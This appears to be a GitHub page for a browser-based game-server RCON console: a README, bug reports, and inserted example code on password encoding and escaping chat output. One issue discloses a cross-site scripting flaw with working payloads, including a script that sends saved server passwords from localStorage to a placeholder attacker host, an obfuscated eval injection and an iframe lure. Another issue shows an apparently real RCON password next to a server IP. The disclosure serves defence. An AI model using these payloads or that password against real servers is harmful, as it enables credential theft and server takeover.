
webrcon's Introduction

webrcon

Game server Rcon, using websockets.

This website is accessible here.

Source Code

The source code for the site is on the gh-pages branch.

The code is purposely made to work purely in the browser, with no server backend, and on as many devices as possible. It is meant to serve as an example of how to communicate with websocket rcon, but it should also be fully functional.

Features

Connection Memory

The website stores your connections: it remembers your passwords and shows a list of servers you have connected to before. Alternatively, you can just bookmark the page.

This information is never sent anywhere remotely; it is always kept in your browser's local storage. Note that anything in local storage is readable by any script that runs in the page's origin, so a script-injection bug in the panel would expose every saved password (see the "Cross-Site Scripting Vulnerability" issue below).

Server URLs

URLs contain the IP and port of the server you're talking to. You can copy and paste a URL to a friend, who will be prompted to enter the password. If they have already connected to that server before, the page will load like any regular web page without a password prompt.

This way you can link a friend directly to a specific page in the rcon, for example to show them a certain user's information.

Rust

If you're running a Rust server you need to add "+rcon.web 1" to the command line to enable web based Rcon. If you don't define a port it will use the default port, but you will also need to set a password, which you can do with "+rcon.password password". The password is sent as part of the WebSocket URL in the clear (see the "Password security" issue below), so do not expose the rcon port to networks you don't trust.

This will eventually be the default rcon mode. At that point you'll need another command to enable the old Rcon. Eventually the old Rcon will be removed entirely, so if you're a tool maker or otherwise depend on it, it would be advisable to support web rcon as soon as possible.

webrcon's People

Contributors

garrynewman, stopspazzing


webrcon's Issues

Password security

I would like to address a security vulnerability in the current system.
At the moment you connect to the server by calling ws://<ip>:<port>/<plain-text-password>.
In this case, using a plain-text password makes it very easy to obtain the password by tracing someone's connection.
Therefore, I would like to suggest an alternative way to connect to the server.

As you have already stated on the devblogs that webrcon is going to become the preferred rcon tool, it should be a secure solution.

The most effective way would be to use the wss:// protocol and to send the password in a message after establishing a connection. However, this would require every server to have a valid SSL certificate, which is really impractical.

Because of this, I'd suggest to connect to ws://<ip>:<port>/ and to use a handshake method. The server sends the client a salt in order for the client to be able to generate a hash of the password and to send it to the server.

Client                  Server
connect message ------->
<-------------------- salt
hashed password ------->
<----------- accept/reject

Error when trying to view player XP charts.

Error:

TypeError: Cannot read property 'length' of null
at SVGGElement. (nv.d3.js:5654)
at d3.js:962
at d3_selection_each (d3.js:968)
at Array.d3_selectionPrototype.each (d3.js:961)
at SVGGElement. (nv.d3.js:5652)
at d3.js:962
at d3_selection_each (d3.js:968)
at Array.d3_selectionPrototype.each (d3.js:961)
at Array.chart (nv.d3.js:5498)
at Array.d3_selectionPrototype.call (d3.js:975)
(anonymous function) @ angular.js:12520

Call stack:
sttgfk 1

Closed connection 1006

Tried to access my server and a friend's server with both the official HTTP link and my own setup; both fail with connection error 1006.

Trying to administrate a gmod server (not sure if this works for gmod, as it doesn't say it won't).

Would appreciate more robust commenting

Hello, I am trying to write a simple library for webRCON in C#. At the moment I am having a bit of trouble understanding the handshake method here. I'm pretty bad with JavaScript, so trying to deduce what is happening isn't proving very fruitful.

would it be possible for someone to write up some simple comments / docs explaining the connection process?

Thanks!

What are Collections

The "Collections" number on my server keeps increasing until it starts lagging really hard.
What are these collections and how do I clear them?

Thanks

Browser Updates

With the recent browser updates in Chrome, Edge, and Firefox, the webrcon stopped connecting. Doesn't provide an error, just does nothing when clicking the connect button.

Wrong Steam ID

If you click on a player's name in the chat, you are redirected to the player info section, but the Steam ID shown is XXXXXXXXXXXXXXXXXX0; that 0 at the end replaces the real last digit of the Steam ID.

HTTPS on facepunch.github.io/webrcon/

When using HTTPS on facepunch.github.io/webrcon/, it is not possible to connect to the server.
The error message looks like this:

Error: The operation is insecure.
RconService/Service.Connect@https://facepunch.github.io/webrcon/js/rconService.js:19:19
ConnectionController/$scope.Connect@https://facepunch.github.io/webrcon/js/connection.js:62:3
fn@https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular.min.js line 213 > Function:4:209
e@https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular.min.js:254:74
$eval@https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular.min.js:133:309
$apply@https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular.min.js:134:12
compile/</<@https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular.min.js:254:124
dispatch@https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js:4:8497
add/r.handle@https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js:4:5235

URI Encoding missing

This is not working with passwords that have multiple % characters in them; I guess it is not properly using URLEncode.
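An added example, covering both the "Would appreciate more robust commenting" request and the URI-encoding bug above: the pieces a client needs to open a webrcon connection, written as plain functions so they can be exercised without a server. This is not the project's own code. The URL form ws://<ip>:<port>/<password> is the one described in the "Password security" issue; the command packet fields (Identifier, Message, Name) are what I recall js/rconService.js sending and should be treated as an assumption to check against that file. The host, port and passwords in the comments are made up.

```javascript
// Added example, not webrcon's code. Packet field names are an assumption
// taken from memory of js/rconService.js; verify against that file.

// The password is a path segment, so it has to be percent-encoded. A raw "%"
// not followed by two hex digits is an invalid escape, and "/" or "#" would
// be parsed as path separator / fragment instead of password characters.
function buildRconUrl(host, port, password) {
  return `ws://${host}:${port}/${encodeURIComponent(password)}`;
}

// The naive form the bug report describes: raw concatenation.
function buildRconUrlUnencoded(host, port, password) {
  return `ws://${host}:${port}/${password}`;
}

// What a server (or any URL parser) recovers from the path segment.
// Throws URIError on a malformed escape such as "p%%w".
function passwordFromUrl(url) {
  const path = new URL(url).pathname.slice(1);
  return decodeURIComponent(path);
}

// Identifier lets the client match a reply to the command that produced it.
let nextIdentifier = 1;
function buildCommandPacket(command) {
  return JSON.stringify({ Identifier: nextIdentifier++, Message: command, Name: 'WebRcon' });
}

// Parse a reply and check the assumed field shape before trusting it.
function parseReply(raw) {
  const reply = JSON.parse(raw);
  if (typeof reply.Identifier !== 'number' || typeof reply.Message !== 'string') {
    throw new Error('unexpected reply shape');
  }
  return reply;
}

// Live use in a browser (or a runtime with a global WebSocket). Not exercised offline.
function connect(host, port, password, onReply) {
  if (typeof WebSocket === 'undefined') throw new Error('no WebSocket in this runtime');
  const socket = new WebSocket(buildRconUrl(host, port, password));
  socket.onmessage = (ev) => onReply(parseReply(ev.data));
  socket.onopen = () => socket.send(buildCommandPacket('status'));
  return socket;
}
```

Run buildRconUrl and buildRconUrlUnencoded side by side with a password such as "p%%w" or "a/b#c": the encoded form round-trips through passwordFromUrl, the raw form either throws URIError or silently loses everything after the "/" or "#".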

Binds to all IP's despite rcon.ip being specified

Using +rcon.web 1 on the command line, we noticed that the server listens for the rcon port on all IPs (0.0.0.0:28016, for example).
Not using +rcon.web 1 on the command line makes it listen on the IP specified by rcon.ip. This is not the case with +rcon.web.

Command line:
./RustDedicated -batchmode +server.maxplayers 50 +server.ip 176.31.21.146 +server.port 28015 +rcon.web 1 +rcon.ip 176.31.21.146 +rcon.port 28017 +rcon.password "4o6itt" -logfile "log.txt"

Error on the log:

SocketException: Address already in use
at System.Net.Sockets.Socket.Bind (System.Net.EndPoint local_end) [0x00000] in :0
at System.Net.Sockets.TcpListener.Start (Int32 backlog) [0x00000] in :0
at System.Net.Sockets.TcpListener.Start () [0x00000] in :0
at WebSocketSharp.Server.WebSocketServer.startReceiving () [0x00000] in :0
at WebSocketSharp.Server.WebSocketServer.Start () [0x00000] in :0
at Facepunch.Rcon.Listener.Start () [0x00000] in :0
at Facepunch.RCon.Initialize () [0x00000] in :0
at Bootstrap+c__IteratorF.MoveNext () [0x00000] in :0
at UnityEngine.SetupCoroutine.InvokeMoveNext (IEnumerator enumerator, IntPtr returnValueAddress) [0x00000] in :0
UnityEngine.MonoBehaviour:StartCoroutine_Auto(IEnumerator)
UnityEngine.MonoBehaviour:StartCoroutine(IEnumerator)
c__IteratorE:MoveNext()
UnityEngine.SetupCoroutine:InvokeMoveNext(IEnumerator, IntPtr)

The IP address isn't used by anything else, nor is the port.

Cross-Site Scripting Vulnerability on Administrator Chat Message, Exploitable to Steal Server Credentials

Summary

There is a cross-site scripting vulnerability when loading messages sent from the RCON panel. An attacker can deploy a Rust server, add the poisoned XSS message to the Rust chat, then trick a victim into automatically logging in and loading in the poisoned message which has the capability to retrieve the stored server credentials in the "localStorage" object.

Steps to Reproduce - alert prompt

  1. Login to your own rust server
  2. Browse to "http://facepunch.github.io/webrcon/#/YOUR_HOST/chat"
  3. Send the following message in chat from the RCON console...
<img/src='x'/onerror='alert(1)'/>
  4. Observe the alert prompt. Additionally, refresh the page and observe the alert prompt

Steps to Reproduce - exfiltrating password

An attacker could host the following script on their HTTP server...

// serialise every localStorage key (including the saved server connections and passwords)
var steal = btoa(JSON.stringify(localStorage));
// send the blob to the attacker's host as a query parameter
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://YOUR_HOST/?x=' + steal, true);
xhr.send();

Which would be stored on the service by sending the following message with the script source pointed towards the attacker controlled script...

<img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vWU9VUkhPU1QiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>

Then, once the message has been sent to their own server, tricking a victim into loading the payload via the following attacker controlled page:

<iframe src="http://facepunch.github.io/webrcon/#/YOUR_HOST/info?password=password"></iframe>
<iframe src="http://facepunch.github.io/webrcon/#/YOUR_HOST/chat"></iframe>

Which would exfiltrate the password by sending an HTTP request like this:

GET /?x=eyJwcmV2aW91c0Nvbm5lY3Rpb25zIjoiW3tcIkFkZHJlc3NcIjpcIllPVVJfU0VSVkVSXCIsXCJQYXNzd29yZFwiOlwiWU9VUl9QQVNTV09SRCFcIixcImRhdGVcIjpcIjIwMjEtMDItMjBUMDY6MjU6MDEuNDAxWlwifV0ifQ== HTTP/1.1

Impact

An attacker could use this to exfiltrate RCON passwords of anyone using the Facepunch RCON service.
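An added example, not the project's code, tying this report back to the "Connection Memory" section of the README: why the chat payload executes, the rendering that prevents it, and what the exfiltrated blob looks like. Rendering is done on strings so it runs outside a browser; in a DOM-based client the same distinction is innerHTML (unsafe) versus textContent (safe). The sample store below is constructed, and its field names are assumed from the captured request in the report.

```javascript
// Added example (not webrcon's code): unsafe vs. escaped chat rendering, and
// the exfil encoding the report describes, on constructed data.

// Payload quoted in the report: the parser builds an <img>, "x" fails to
// load, and the onerror handler runs.
const PAYLOAD_ALERT = "<img/src='x'/onerror='alert(1)'/>";

// Vulnerable: the chat message is spliced into markup verbatim.
function renderChatLineUnsafe(message) {
  return `<div class="chat-line">${message}</div>`;
}

// Escape every character that can open or close a tag or an attribute value.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: the message can only ever be rendered as text.
function renderChatLine(message) {
  return `<div class="chat-line">${escapeHtml(message)}</div>`;
}

// Crude check used by the test: is there any tag syntax left inside the wrapper?
// (The real arbiter is the browser's HTML parser.)
function containsMarkup(html) {
  const inner = html.slice('<div class="chat-line">'.length, -'</div>'.length);
  return /[<>]/.test(inner);
}

// What the report's exfil script does to localStorage.
function encodeExfil(storeLike) {
  return Buffer.from(JSON.stringify(storeLike), 'utf8').toString('base64');
}

// Recover the store from the x= parameter of a captured exfil request.
function decodeExfil(b64) {
  return JSON.parse(Buffer.from(b64, 'base64').toString('utf8'));
}

// Constructed sample of what the panel keeps in localStorage (values are
// strings, as localStorage requires; field names assumed from the report).
const SAMPLE_STORE = {
  previousConnections: JSON.stringify([
    { Address: '203.0.113.10:28016', Password: 'example-rcon-password', date: '2021-02-20T06:25:01.401Z' },
  ]),
};
```

Feed the x= value from a captured request into decodeExfil to see exactly which saved connections left a victim's browser. The escaping fix is the cheap half of the remedy; the other half is not keeping long-lived credentials in localStorage at all, since any script that runs in the page's origin can read it.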

API docs for Rust servers

Thank you for this reference implementation of a Rust RCON console.

Do you have any API documentation that describes the various commands that are available?

Also, is it possible to request some public information from a Rust server without the password (player count, and so on). Or how do services like battle metrics and rust monitor get all their info from servers they don't own?

Cheers and thank you

/CC @garrynewman

Changing packet

Hey there,
I was recently wondering whether I could modify the packet so that when I execute it I can say something as someone other than "SERVER". The problem is probably that I execute commands via the packet; regarding this, I thought I'd ask if there is any known way of getting around it. I don't want to use any plugins, just pure rcon.

Error 1006

Hey, so recently I've been looking for a web rcon, so I tried this. But when I try to connect it says

Connection was Closed - Error 1006

Please help, since I really need this.
